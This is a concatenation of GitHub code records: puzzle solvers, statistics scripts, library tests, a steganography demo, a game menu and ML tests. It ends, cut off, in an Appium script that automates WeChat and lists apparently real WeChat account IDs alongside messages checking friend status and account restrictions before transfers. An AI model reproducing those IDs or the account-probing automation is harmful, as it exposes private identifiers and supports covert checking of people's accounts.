\"\"\"\n Calculate total distance for a given route through a graph.\n\n Keyword arguments:\n route --- a list of node names that form the route\n graph --- a dictionary mapping node name pairs to distance\n \"\"\"\n length = 0\n for i in range(1, len(route)):\n length += graph[(route[i - 1], route[i])]\n return length\n\n\ndef solver(file):\n \"\"\"\n Take a file object with input and solve AoC 2015.09 problem on the input.\n\n Keyword arguments:\n file --- a file object to read input from\n \"\"\"\n graph = {}\n places = set()\n for line in file:\n (start, end, length) = re.match(r\"(\\w+) to (\\w+) = (\\d+)\", line).groups()\n places.add(start)\n places.add(end)\n graph[(start, end)] = int(length)\n graph[(end, start)] = int(length)\n\n places = list(places)\n\n min_length = 100000000\n max_length = 0\n min_route = []\n max_route = []\n for route in [permute(places, index) for index in range(0, factorial(len(places)))]:\n length = distance(route, graph)\n if min_length > length:\n min_length = length\n min_route = route\n if max_length < length:\n max_length = length\n max_route = route\n\n return ((min_length, \"->\".join(min_route)), (max_length, \"->\".join(max_route)))\n\n\nif __name__ == \"__main__\":\n solution = solver(sys.stdin)\n\n print(\"Part A: The length of minimal route {1} is {0}.\".format(*solution[0]))\n print(\"Part B: The length of maximal route {1} is {0}.\".format(*solution[1]))\n","repo_name":"kav2k/AoC","sub_path":"2015/09/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":1966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"19104778883","text":"import pandas as pd\nimport statistics as st\nimport plotly.figure_factory as ff\n\ndf = pd.read_csv(\"StudentsPerformance.csv\")\n\nmathsScore = df[\"math score\"].tolist()\nreadingScore = df[\"reading score\"].tolist()\nwritingScore = df[\"writing score\"].tolist()\n\n\ndef Mean_Median_Mode():\n # Mean\n mathsMean = st.mean(mathsScore)\n readingMean = st.mean(readingScore)\n writingMean = st.mean(writingScore)\n\n\n # Median\n mathsMedian = st.median(mathsScore)\n readingMedian = st.median(readingScore)\n writingMedian = st.median(writingScore)\n\n\n # Mode\n mathsMode = st.mode(mathsScore)\n readingMode = st.mode(readingScore)\n writingMode = st.mode(writingScore)\n\n\n # Standerd Diviation\n mathsStd = st.stdev(mathsScore)\n readingStd = st.stdev(readingScore)\n writingStd = st.stdev(writingScore)\n\n\n print('\\n Mean of Maths Score: ', mathsMean, '\\n', 'Mean of Reading Score: ',\n readingMean, '\\n', 'Mean of Writing Score: ', writingMean)\n\n print('\\n Median of Maths Score: ', mathsMedian, '\\n', 'Median of Reading Score: ',\n readingMedian, '\\n', 'Median of Writing Score: ', writingMedian)\n\n print('\\n Mode of Maths Score: ', mathsMode, '\\n', 'Mode of Reading Score: ',\n readingMode, '\\n', 'Mode of Writing Score: ', writingMode)\n\n print('\\n Standerd deviation of Maths Score: ', mathsStd, '\\n', 'Standerd deviation of Reading Score: ',\n readingStd, '\\n', 'Standerd deviation of Writing Score: ', writingStd)\n\n\n\n\n # Maths\n\n sd1_Start, sd1_End = mathsMean - mathsStd, mathsMean + mathsStd\n sd2_Start, sd2_End = mathsMean - (2* mathsStd), mathsMean + (2* mathsStd)\n sd3_Start, sd3_End = mathsMean - (3* mathsStd), mathsMean + (3* mathsStd)\n\n M_counterStd1 = 0\n M_counterStd2 = 0\n M_counterStd3 = 0\n\n for i in range(0, len(mathsScore)):\n value = mathsScore[i]\n if value >= sd1_Start and value <= sd1_End:\n M_counterStd1 += 1\n\n if value >= sd2_Start and value <= sd2_End:\n M_counterStd2 += 1\n\n if value >= sd3_Start and value <= sd3_End:\n M_counterStd3 += 1\n\n\n M_perOfSd1 = (M_counterStd1*100)/len(mathsScore)\n M_perOfSd2 = (M_counterStd2*100)/len(mathsScore)\n M_perOfSd3 = (M_counterStd3*100)/len(mathsScore)\n\n print('\\n Maths Std1: ',M_perOfSd1)\n print(' Maths Std2: ',M_perOfSd2)\n print(' Maths Std3: ',M_perOfSd3)\n\n\n\n # Reading Score\n\n sd1_Start, sd1_End = readingMean - readingStd, readingMean + readingStd\n sd2_Start, sd2_End = readingMean - (2* readingStd), readingMean + (2* readingStd)\n sd3_Start, sd3_End = readingMean - (3* readingStd), readingMean + (3* readingStd)\n\n R_counterStd1 = 0\n R_counterStd2 = 0\n R_counterStd3 = 0\n\n for i in range(0, len(readingScore)):\n value = readingScore[i]\n if value >= sd1_Start and value <= sd1_End:\n R_counterStd1 += 1\n\n if value >= sd2_Start and value <= sd2_End:\n R_counterStd2 += 1\n\n if value >= sd3_Start and value <= sd3_End:\n R_counterStd3 += 1\n\n R_perOfSd1 = (R_counterStd1*100)/len(readingScore)\n R_perOfSd2 = (R_counterStd2*100)/len(readingScore)\n R_perOfSd3 = (R_counterStd3*100)/len(readingScore)\n\n print('\\n Reading Std1: ',R_perOfSd1)\n print(' Reading Std2: ',R_perOfSd2)\n print(' Reading Std3: ',R_perOfSd3)\n\n\n\n\n # Writing Score\n\n sd1_Start, sd1_End = writingMean - writingStd, writingMean + writingStd\n sd2_Start, sd2_End = writingMean - (2* writingStd), writingMean + (2* writingStd)\n sd3_Start, sd3_End = writingMean - (3* writingStd), writingMean + (3* writingStd)\n\n W_counterStd1 = 0\n W_counterStd2 = 0\n W_counterStd3 = 0\n\n for i in range(0, len(readingScore)):\n value = readingScore[i]\n if value >= sd1_Start and value <= sd1_End:\n W_counterStd1 += 1\n\n if value >= sd2_Start and value <= sd2_End:\n W_counterStd2 += 1\n\n if value >= sd3_Start and value <= sd3_End:\n W_counterStd3 += 1\n\n W_perOfSd1 = (W_counterStd1*100)/len(readingScore)\n W_perOfSd2 = (W_counterStd2*100)/len(readingScore)\n W_perOfSd3 = (W_counterStd3*100)/len(readingScore)\n\n print('\\n Writing Std1: ',W_perOfSd1)\n print(' Writing Std2: ',W_perOfSd2)\n print(' Writing Std3: ',W_perOfSd3)\n\n\n\nMean_Median_Mode()\n\ninput(\"\\n\\nPlease Press Enter to Load the Graph\")\n\ngraph1 = ff.create_distplot([mathsScore, readingScore, writingScore], [\n 'Maths Score', 'ReadingScore', 'WritingScore'], show_hist=False)\ngraph1.show()\n","repo_name":"Anchitlahkar/Normal-Distribution","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"42258964683","text":"import unittest\n\nimport numpy as np\nfrom parameterized import parameterized\nimport jax.numpy as jnp\nimport chex\n\nimport ymir\n\n\nclass TestDistributions(unittest.TestCase):\n\n def setUp(self):\n self.rng = np.random.default_rng(0)\n self.X = self.rng.random((50, 1))\n self.y = np.sin(self.X).round().reshape(-1)\n\n @parameterized.expand([(nclients, ) for nclients in range(1, 10)])\n def test_homogeneous(self, nclients):\n dist = ymir.utils.distributions.homogeneous(self.y, nclients, 2, self.rng)\n self.assertEqual(len(dist), nclients)\n for d in dist:\n np.testing.assert_allclose(np.unique(self.y[d]), np.unique(self.y))\n\n @parameterized.expand([(nclients, ) for nclients in range(1, 10)])\n def test_extreme_heterogeneous(self, nclients):\n dist = ymir.utils.distributions.extreme_heterogeneous(self.y, nclients, 2, self.rng)\n self.assertEqual(len(dist), nclients)\n for i, d in enumerate(dist):\n self.assertEqual(np.unique(self.y[d]), i % 2)\n\n @parameterized.expand([(nclients, ) for nclients in range(1, 5)])\n def test_lda(self, nclients):\n dist = ymir.utils.distributions.lda(self.y, nclients, 2, self.rng)\n self.assertEqual(len(dist), nclients)\n for d in dist:\n np.testing.assert_allclose(np.unique(self.y[d]), np.unique(self.y))\n\n def test_iid_partition(self):\n dist = ymir.utils.distributions.iid_partition(self.y, 2, 2, self.rng)\n self.assertEqual(len(dist), 2)\n for d in dist:\n np.testing.assert_allclose(np.unique(self.y[d]), np.unique(self.y))\n\n def test_shard(self):\n dist = ymir.utils.distributions.shard(self.y, 2, 2, self.rng)\n self.assertEqual(len(dist), 2)\n for d in dist:\n np.testing.assert_allclose(np.unique(self.y[d]), np.unique(self.y))\n\n def test_assign_classes(self):\n dist = ymir.utils.distributions.assign_classes(self.y, 2, 2, self.rng, classes=[0, 1])\n self.assertEqual(len(dist), 2)\n for i, d in enumerate(dist):\n np.testing.assert_allclose(np.unique(self.y[d]), i)\n\n\nclass Client:\n\n def step(self, weights, return_weights=False):\n return 0.0, weights, 2\n\n def analytics(self):\n return [0.3, 0.4]\n\n\nclass TestNetwork(unittest.TestCase):\n\n def setUp(self):\n self.network = ymir.utils.network.Network()\n self.clients = [Client() for _ in range(10)]\n\n def test_member_variables(self):\n self.assertEqual(self.network.clients, [])\n self.assertEqual(self.network.C, 1.0)\n self.assertEqual(self.network.K, 0)\n\n def test_len(self):\n self.assertEqual(len(self.network), 0)\n self.network.add_client(self.clients[0])\n self.assertEqual(len(self.network), 1)\n self.network = ymir.utils.network.Network()\n\n def test_add_client(self):\n self.network.add_client(self.clients[0])\n self.assertEqual(self.network.clients[0], self.clients[0])\n self.network = ymir.utils.network.Network()\n\n def test_call(self):\n for client in self.clients:\n self.network.add_client(client)\n losses, weights, data = self.network(1.0)\n np.testing.assert_array_equal(losses, np.repeat(0.0, len(self.clients)))\n np.testing.assert_array_equal(weights, np.repeat(1.0, len(self.clients)))\n np.testing.assert_array_equal(data, np.repeat(2, len(self.clients)))\n\n def test_analytics(self):\n for client in self.clients:\n self.network.add_client(client)\n np.testing.assert_array_equal(self.network.analytics(), [[0.3, 0.4]] * len(self.clients))\n\n\n@chex.dataclass\nclass Params:\n \"\"\"\n Parameter trees for testing.\n \"\"\"\n w: chex.ArrayDevice\n b: chex.ArrayDevice\n\n\nclass TestFunctions(unittest.TestCase):\n def test_ravel(self):\n ravelled_params = ymir.utils.functions.ravel(Params(w=jnp.array([1, 1]), b=jnp.array([1])))\n np.testing.assert_array_equal(jnp.array([1, 1, 1]), ravelled_params)\n \n def test_gradient(self):\n a = Params(w=jnp.array([3, 3]), b=jnp.array([3]))\n b = Params(w=jnp.array([1, 2]), b=jnp.array([3]))\n grad = ymir.utils.functions.gradient(a, b)\n np.testing.assert_array_equal(np.array([0, 2, 1]), grad)\n\n def test_scale_sum(self):\n ss = ymir.utils.functions.scale_sum(jnp.array([[1, 1], [0, 0], [2, 3]]), jnp.array([0.1, 3, 5]))\n np.testing.assert_array_equal(jnp.array([10.1, 15.1], dtype=jnp.float32), ss)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"codymlewis/ymir","sub_path":"tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":4562,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"35"} +{"seq_id":"11068452309","text":"import io\nimport os\n\nfrom setuptools import setup, find_packages\n\n\nhere = os.path.abspath(os.path.dirname(__file__))\n\n# Avoids IDE errors, but actual version is read from VERSION\n__version__ = None\nexec(open('VERSION').read())\n\nshort_description = 'Text pair classification toolkit.'\n\n# Get the long description from the README file\nwith io.open(os.path.join(here, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\n\ninstall_requires = [\n 'numpy >= 1.14',\n 'tqdm >= 4.19.4',\n 'pandas >= 0.23.1',\n 'torch >= 1.0',\n 'spacy >= 2.0'\n]\n\n\nsetup(\n name=\"Lion\",\n version=__version__,\n author=\"Lixin Su, Xinyu Ma, etc\",\n author_email=\"\",\n description=(short_description),\n license=\"Apache 2.0\",\n keywords=\"text pair classification toolkit\",\n url=\"\",\n packages=find_packages(),\n long_description=long_description,\n long_description_content_type='text/markdown',\n classifiers=[\n \"Development Status :: 1 - Alpha\",\n 'Environment :: Console',\n 'Operating System :: POSIX :: Linux',\n 'Topic :: Scientific/Engineering :: Artificial Intelligence',\n \"License :: OSI Approved :: Apache Software License\",\n 'Programming Language :: Python :: 3.6'\n ],\n install_requires=install_requires,\n)\n","repo_name":"lixinsu/Lion","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"35"} +{"seq_id":"29427435997","text":"from django.shortcuts import render_to_response\nfrom black_board.models import ReportGetter\nimport models\nimport config\n\ndef genPics(pic_names):\n\n import subprocess\n from os.path import dirname, join, normpath, realpath, isfile\n\n pics_path = dirname(realpath(__file__))\n pics_path = normpath(join(pics_path, '..', 'templates', 'pics'))\n\n for pic in pic_names:\n if not isfile(join(pics_path, pic + '.png')):\n subprocess.call(['perl','png_gen.pl',pic],cwd=pics_path)\n\n\ndef index(request, timestamp=None, branch=None):\n\n results, modules, runs, branches, timestamp, branch = ReportGetter.get(timestamp, branch)\n modules.sort()\n top_header = [\"Platform\", \"Compiler\", \"Config\"]\n\n genPics(modules + top_header)\n response = render_to_response(\"black_board.html\", {\n 'headers' : modules,\n 'results' : results,\n 'top_header' : top_header,\n 'runs' : runs,\n 'timestamp' : timestamp,\n 'branches' : branches,\n 'branch' : branch\n })\n\n return response\n\n","repo_name":"maskedbaby-ch/wav-sai","sub_path":"MAPS-K64/MAPS-K64_1.0.0/rtos/mqx/tests/autofrm/utils/board/web_interface/black_board/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"8786347680","text":"#Steganography\r\n\r\nimport cv2 # pip install opencv-python\r\n\r\ndef spiltbyte(by): #011 000 01\r\n first_three_bits = by >> 5\r\n mid_three_bits = (by >> 2) & 7\r\n last_two_bits = by & 3\r\n return first_three_bits, mid_three_bits, last_two_bits\r\n\r\ndef merge_bits(bits) : #[3,0, 1] => 97\r\n # result = bits[0] <<3 #make room for 3 bits at the RHS\r\n # result = result | bits[1] #merge the mid 3 bits\r\n # result = result << 2 #make room for 2 bits at the RHS\r\n # result = result | bits[2] #merge the mid 2 bits\r\n\r\n return (((bits[0]<<3) | bits[1]) << 2) | bits[2]\r\n\r\n\r\ndef embed(vessel_image, target_image):\r\n #load the vessel_image into memory\r\n mem_image = cv2.imread(vessel_image)\r\n print(type(mem_image))\r\n print(mem_image.shape)\r\n\r\n #dummy data to embed\r\n data = [x for x in range(65,91)]\r\n print(data)\r\n size = len(data)\r\n indx = 0\r\n\r\n #embedding loop\r\n r =0\r\n while r < mem_image.shape[0] and indx < size:\r\n c =0\r\n while c < mem_image.shape[1] and indx < size:\r\n bits = spiltbyte(data[indx])\r\n\r\n #Free 2,3,3 bits of the pixel\r\n mem_image[r, c, 0] &= 252 #blue band\r\n mem_image[r, c, 1] &= 248 #green band\r\n mem_image[r, c, 2] &= 248 #red band\r\n\r\n #Merge the bits into the bands\r\n mem_image[r, c, 0] |= bits[2] # blue band\r\n mem_image[r, c, 1] |= bits[1] # green band\r\n mem_image[r, c, 2] |= bits[0] # red band\r\n\r\n #next val to embed\r\n indx+=1\r\n\r\n c+=1\r\n r+=1\r\n\r\n #save back the image\r\n cv2.imwrite(target_image, mem_image)\r\n\r\ndef extract(emb_image):\r\n #load the image in memory\r\n mem_img = cv2.imread(emb_image)\r\n #print(mem_img.shape)\r\n qty_to_extract = 26\r\n width = mem_img.shape[1]\r\n indx =0\r\n buffer = []\r\n temp = []\r\n while indx < qty_to_extract:\r\n r = indx //width\r\n c = indx % width\r\n temp.clear()\r\n for i in range(3): #0,1,2\r\n temp.append(mem_img[r,c,2-i] & 2 ** (3 - (i+1) // 3) - 1)\r\n\r\n buffer.append(merge_bits(temp))\r\n indx+=1\r\n\r\n\r\n return buffer\r\n\r\ndef main():\r\n embed('d:/steganography/snake.jpg', 'd:/steganography/new_snake.png')\r\n buffer = extract('d:/steganography/new_snake.png')\r\n print(buffer)\r\n\r\nmain()\r\n\r\n\r\n","repo_name":"Aryash1408/Steganography","sub_path":"steganography.py","file_name":"steganography.py","file_ext":"py","file_size_in_byte":2343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"41361212028","text":"import arcade\nimport arcade.gui\nfrom constants import *\nfrom game.screens.instruction_screen import InstructionView\n\n# TODO - Figure out how to add restart button\nclass PauseScreen(arcade.View):\n \"\"\"Pause Screen\n\n This is the pause screen, it pauses the game:\n\n Attributes:\n _background_img: Loads background image for game\n manager (class): Creates an instance of a UImanager class from arcade\n game_view (class): Current game state\n v_box (class): Controls layout of pause menu, instance of UIBoxLayout\n \"\"\"\n\n def __init__(self, game_view, sound):\n \"\"\"Initiates pause screen\n\n Args:\n game_view (game_view): Current state of the game\n \"\"\"\n super().__init__()\n self._background_img = arcade.load_texture(BACKGROUND_IMG)\n self.manager = arcade.gui.UIManager()\n self.manager.enable()\n self.game_view = game_view\n self.sounds = sound\n self.v_box = arcade.gui.UIBoxLayout()\n\n title = arcade.gui.UITextArea(\n text=\"PAUSED\",\n width=220,\n height=75,\n font_size=30,\n font_name=TITLE_FONT,\n )\n\n self.v_box.add(title).with_space_around(bottom=20)\n\n resume_button = arcade.gui.UIFlatButton(text=\"Resume\", width=200)\n self.v_box.add(resume_button.with_space_around(bottom=20))\n\n control_button = arcade.gui.UIFlatButton(text=\"Controls\", width=200)\n self.v_box.add(control_button.with_space_around(bottom=20))\n\n quit_button = arcade.gui.UIFlatButton(text=\"Quit\", width=200)\n self.v_box.add(quit_button.with_space_around(bottom=20))\n\n resume_button.on_click = self.on_resume\n control_button.on_click = self.on_controls\n quit_button.on_click = self.on_quit\n\n self.manager.add(\n arcade.gui.UIAnchorWidget(\n anchor_x=\"center_x\", anchor_y=\"center_y\", child=self.v_box\n )\n )\n\n def on_resume(self, event: arcade.gui.UIOnClickEvent):\n \"\"\"Resumes game\n\n Args:\n event (arcade.gui.UIOnClickEvent): Tracks mouse\n \"\"\"\n self.window.show_view(self.game_view)\n\n def on_controls(self, event: arcade.gui.UIOnClickEvent):\n \"\"\"Shows InstructionView\n\n Args:\n event (arcade.gui.UIOnClickEvent): Tracks mouse\n \"\"\"\n instruction_view = InstructionView()\n instruction_view.setup(self)\n self.window.show_view(instruction_view)\n\n def on_quit(self, event: arcade.gui.UIOnClickEvent):\n \"\"\"Quits the game\n\n Args:\n event (arcade.gui.UIOnClickEvent): Tracks mouse\n \"\"\"\n arcade.exit()\n\n def on_draw(self):\n \"\"\"Draws everything on the screen\"\"\"\n self.clear()\n self.window.set_mouse_visible(True)\n arcade.draw_lrwh_rectangle_textured(\n 0, 0, self.window.width, self.window.height, self._background_img\n )\n game_screen = self.game_view._cast.get_all_actors()\n for item in game_screen:\n item.draw()\n\n self.manager.draw()\n\n def on_key_press(self, key, key_modifiers):\n \"\"\"Keeps track of all keys that are pressed\n\n Args:\n key (int): What key is being pressed\n key_modifiers (int): I think this is also an integer.\n Checks to see if any modifiers like the shift key are being held down.\n \"\"\"\n if key == arcade.key.ESCAPE:\n self.window.show_view(self.game_view)\n","repo_name":"quailninja/LoneSpacer","sub_path":"spacer/game/screens/pause_screen.py","file_name":"pause_screen.py","file_ext":"py","file_size_in_byte":3518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"36760811806","text":"import streamlit as st\nimport pandas as pd\nimport numpy as np\nimport joblib\nimport requests\nimport os\n\nst.title('Personalised Singapore HDB Resale Price Predictor')\n\nst.subheader(\"By Kenneth Lim\")\nst.write(\"[GitHub](https://github.com/Lzwk16) | [LinkedIn](https://www.linkedin.com/in/lzwk16/)\")\n\nst.markdown('Please input your values')\n\n#input features for predictions\nfloor_area_sqm = st.number_input('Floor Area (SQM)', min_value=30, max_value=300)\nremaining_lease = st.slider('Remaining Years of Lease', min_value=0, max_value=99)\nmid = st.slider('Floor Number', min_value=0, max_value=51)\nmax_floor_lvl = st.slider('Maximum Floor Level', min_value=0, max_value=51)\nflat_type = st.selectbox('Flat Type', ('1 ROOM', '2 ROOM', '3 ROOM', '4 ROOM', '5 ROOM', 'EXECUTIVE', 'MULTI_GENERATION'))\nmrt_nearest_distance = st.number_input('Distance to Nearest MRT Station (metres)', min_value=0, max_value=3544)\ntown = st.selectbox('Estate', ('ANG MO KIO', 'BEDOK', 'BISHAN', 'BUKIT BATOK', 'BUKIT MERAH', 'BUKIT PANJANG', 'BUKIT TIMAH', 'CENTRAL AREA', 'CHOA CHU KANG', \n 'CLEMENTI', 'GEYLANG', 'HOUGANG', 'JURONG EAST', 'JURONG WEST', 'KALLANG/WHAMPOA', 'MARINE PARADE', 'PASIR RIS', 'PUNGGOL', \n 'QUEENSTOWN', 'SEMBAWANG', 'SENGKANG', 'SERANGOON', 'TAMPINES', 'TOA PAYOH', 'WOODLANDS', 'YISHUN'))\nmature_est = ['ANG MO KIO', 'BEDOK', 'BISHAN', 'BUKIT MERAH', 'BUKIT TIMAH', 'CENTRAL AREA', 'CLEMENTI', \n 'GEYLANG', 'KALLANG/WHAMPOA', 'MARINE PARADE', 'PASIR RIS', 'QUEENSTOWN', 'SERANGOON', \n 'TAMPINES', 'TOA PAYOH']\nif town in mature_est:\n Mature_Estate = 1\nelse:\n Mature_Estate = 0\n\nif st.button('Predict'):\n script_dir = os.path.dirname(os.path.abspath(__file__))\n model_path = os.path.join(script_dir, 'HDB_model_final.joblib')\n model = joblib.load(model_path)\n x = pd.DataFrame([[floor_area_sqm, remaining_lease, mid, max_floor_lvl, flat_type, town, Mature_Estate, mrt_nearest_distance]], \n columns=['floor_area_sqm', 'remaining_lease', 'mid', 'max_floor_lvl', 'flat_type', 'town', 'Mature_Estate', 'mrt_nearest_distance'])\n pred = model.predict(x)[0]\n st.markdown(f'### Predicted Resale Price of your HDB Flat is ${str(int(round(pred, -3)))}')\n","repo_name":"Lzwk16/project-submissions","sub_path":"project-2/Code/HDB_app.py","file_name":"HDB_app.py","file_ext":"py","file_size_in_byte":2283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"14122142908","text":"'''Write a program that inverts a dictionary. I.e., it makes key of one dictionary value of another and vice versa\r\nSample Input:\r\nDict={‘Reg.No”:123, ‘Name’:’abc’,Course’:’CSE’}\r\nSample Output:\r\nInv Dict={123:’Reg.No’, ‘abc’ : ‘Name’, ‘CSE’: ‘Course’}'''\r\ndef invert_dict(dictionary):\r\n inv_dict = {value: key for key, value in dictionary.items()}\r\n return inv_dict\r\ndict = {'Reg.No': 123, 'Name': 'abc', 'Course': 'CSE'}\r\ninv_dict = invert_dict(dict)\r\nprint(\"Inv Dict =\", inv_dict)\r\n\r\n","repo_name":"VPOOJE/PYTHON","sub_path":"dictionary programs/dict2.py","file_name":"dict2.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"113750110","text":"#!usr/bin/env python3\n# Trigrams exercise created by Niels Skvarch\n\n# import modules needed to run\nimport random\nimport sys\n\n\n\n# define functions\ndef read_in_data(filename):\n \"\"\"take in the file of text and create a list of words removing punctuation\"\"\"\n in_data = list()\n translate_chars = str.maketrans({\",\" : \" \", \".\" : \" \", \"?\" : \" \", \"!\" : \" \", \";\" : \" \", \"(\" : \" \", \")\" : \" \"})\n with open(filename, 'r') as f:\n for line in f:\n\n if line.isspace():\n continue\n\n elif line.find('End of the Project Gutenberg EBook') != -1:\n break\n\n else:\n line = line.translate(translate_chars)\n line = line.replace('\"', '')\n line = line.replace('--', ' ')\n in_data.append(line.lower())\n\n return in_data\n\n\ndef make_words(in_data):\n \"\"\"go through the list of words and maintain capitals for the pronoun \"I\" \"\"\"\n words = list()\n capitals = ['I', 'I\\'m', 'I\\'ll', 'I\\'ve', 'I\\'d']\n for line in in_data:\n words.extend(line.split())\n for indx, word in enumerate(words):\n if word.capitalize() in capitals:\n words[indx] = word.capitalize()\n return words\n\n\ndef build_trigram(words):\n \"\"\"\n build up the trigrams dict from the list of words\n returns a dict with:\n keys: word pairs\n values: list of followers\n \"\"\"\n trigrams = {}\n seeda = random.randint(0, len(words)-2)\n seedb = seeda + 2\n seed = words[seeda:seedb]\n for i in range(len(words)-2):\n wordpair = words[i:i+2]\n wordkey = tuple(wordpair)\n wordval = words[i+2]\n if wordkey not in trigrams.keys():\n trigrams[wordkey] = [wordval]\n else:\n trigrams[wordkey].append(wordval)\n\n return trigrams, seed\n\n\ndef build_text(trigrams, seed):\n \"\"\"build a random text list from the trigrams dictionary\"\"\"\n new_text = seed[:]\n counter = 0\n while counter < 500:\n key_pair = new_text[counter : counter + 2]\n key_pair_tup = tuple(key_pair)\n\n if key_pair_tup not in trigrams:\n next_word = random.choice(new_text)\n\n else:\n next_word = random.choice(trigrams[key_pair_tup])\n new_text.append(next_word)\n counter += 1\n return new_text\n\n\ndef write_text(new_text):\n \"\"\"join the text together in a string and return it to the main program\"\"\"\n text_string = ' '.join(new_text)\n return text_string\n\n\nif __name__ == \"__main__\":\n # Using the main program given in the example\n try:\n filename = sys.argv[1]\n except IndexError:\n print(\"You must pass in a filename\")\n sys.exit(1)\n\n in_data = read_in_data(filename)\n words = make_words(in_data)\n trigrams, seed = build_trigram(words)\n new_text = build_text(trigrams, seed)\n text_string = write_text(new_text)\n\n print(text_string)\n","repo_name":"UWPCE-PythonCert-ClassRepos/SP_Online_PY210","sub_path":"students/nskvarch/lesson4/trigrams.py","file_name":"trigrams.py","file_ext":"py","file_size_in_byte":2901,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"35"} +{"seq_id":"1003279312","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom packaging import version\n\nclass Model(nn.Module):\n def __init__(self):\n super(Model, self).__init__()\n\n self.attention_0_0 = nn.MultiheadAttention(embed_dim=64, num_heads=4)\n self.attention_0_1 = nn.MultiheadAttention(embed_dim=40, num_heads=4, kdim=30, vdim=20)\n\n if version.parse(torch.__version__) >= version.parse('1.9'):\n self.attention_1_0 = nn.MultiheadAttention(embed_dim=64, num_heads=4, batch_first=True)\n self.attention_1_1 = nn.MultiheadAttention(embed_dim=40, num_heads=4, kdim=30, vdim=20, batch_first=True)\n\n def forward(self, xq, xk, xv, yq, yk, yv, xmask, ymask):\n x0, _ = self.attention_0_0(xq, xq, xq)\n x1, _ = self.attention_0_0(xq, xk, xv)\n x2, _ = self.attention_0_0(xq, xk, xk, attn_mask=xmask)\n x3, _ = self.attention_0_1(yq, yk, yv, attn_mask=ymask)\n\n if version.parse(torch.__version__) < version.parse('1.9'):\n return x0, x1, x2, x3\n\n xq = xq.transpose(0, 1)\n xk = xk.transpose(0, 1)\n xv = xv.transpose(0, 1)\n yq = yq.transpose(0, 1)\n yk = yk.transpose(0, 1)\n yv = yv.transpose(0, 1)\n\n y0, _ = self.attention_1_0(xq, xq, xq)\n y1, _ = self.attention_1_0(xq, xk, xv)\n y2, _ = self.attention_1_0(xq, xk, xk, attn_mask=xmask)\n y3, _ = self.attention_1_1(yq, yk, yv, attn_mask=ymask)\n\n return x0, x1, x2, x3, y0, y1, y2, y3\n\ndef test():\n torch.set_grad_enabled(False)\n\n net = Model().half().float()\n net.eval()\n\n torch.manual_seed(0)\n xq = torch.rand(20, 1, 64)\n xk = torch.rand(20, 1, 64)\n xv = torch.rand(20, 1, 64)\n yq = torch.rand(15, 1, 40)\n yk = torch.rand(24, 1, 30)\n yv = torch.rand(24, 1, 20)\n xmask = torch.rand(20, 20)\n ymask = torch.rand(4, 15, 24)\n\n a = net(xq, xk, xv, yq, yk, yv, xmask, ymask)\n\n # export torchscript\n if version.parse(torch.__version__) >= version.parse('1.12.0'):\n mod = torch.jit.trace(net, (xq, xk, xv, yq, yk, yv, xmask, ymask), check_trace=False)\n else:\n mod = torch.jit.trace(net, (xq, xk, xv, yq, yk, yv, xmask, ymask))\n mod.save(\"test_nn_MultiheadAttention.pt\")\n\n # torchscript to pnnx\n import os\n os.system(\"../../src/pnnx test_nn_MultiheadAttention.pt inputshape=[20,1,64],[20,1,64],[20,1,64],[15,1,40],[24,1,30],[24,1,20],[20,20],[4,15,24]\")\n\n # ncnn inference\n import test_nn_MultiheadAttention_ncnn\n b = test_nn_MultiheadAttention_ncnn.test_inference()\n\n for a0, b0 in zip(a, b):\n if not torch.allclose(a0, b0, 1e-4, 1e-4):\n print(a0)\n print(b0)\n return False\n return True\n\nif __name__ == \"__main__\":\n if test():\n exit(0)\n else:\n exit(1)\n","repo_name":"Tencent/ncnn","sub_path":"tools/pnnx/tests/ncnn/test_nn_MultiheadAttention.py","file_name":"test_nn_MultiheadAttention.py","file_ext":"py","file_size_in_byte":2805,"program_lang":"python","lang":"en","doc_type":"code","stars":18296,"dataset":"github-code","pt":"35"} +{"seq_id":"11987006637","text":"# coding=utf-8\nfrom appium import webdriver\nimport re\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom appium.webdriver.common.touch_action import TouchAction\nfrom selenium.webdriver.support import expected_conditions as EC\nimport time\n\nnr = r'你不是收款方好友,对方添加你为好友后才能发起转账'\nnr2 = r'对方微信号已被限制登录,为保障你的资金安全,暂时无法完成交易。'\ndesired_caps = {\n \"platformName\": \"Android\", # 系统\n \"platformVersion\": \"6.0\", # 系统版本号\n \"deviceName\": \"3782a8457d94\", # 设备名\n \"appPackage\": \"com.tencent.mm\", # 包名\n \"appActivity\": \"com.tencent.mm.ui.LauncherUI\", # app 启动时主 Activity\n \"unicodeKeyboard\": True, # 使用自带输入法\n \"noReset\": True, # 保留 session 信息,可以避免重新登录\n \"fullReset\": False, # 重启appium不会清空登录数据\n # \"skipDeviceInitialization\" : True,\n \"automationName\": \"UiAutomator1\" # 不会重复安装setting\n}\nll = ['微信号: a75559058', '微信号: chenyu349134578', '微信号: zhu1314277', '微信号: wxid_u14iculfxf6j22',\n '微信号: wxid_p3gnzuku06o722', '微信号: hao1981319', '微信号: lus1819', '微信号: lwh396925999',\n '微信号: wxid_7tc05e8obi0021', '微信号: 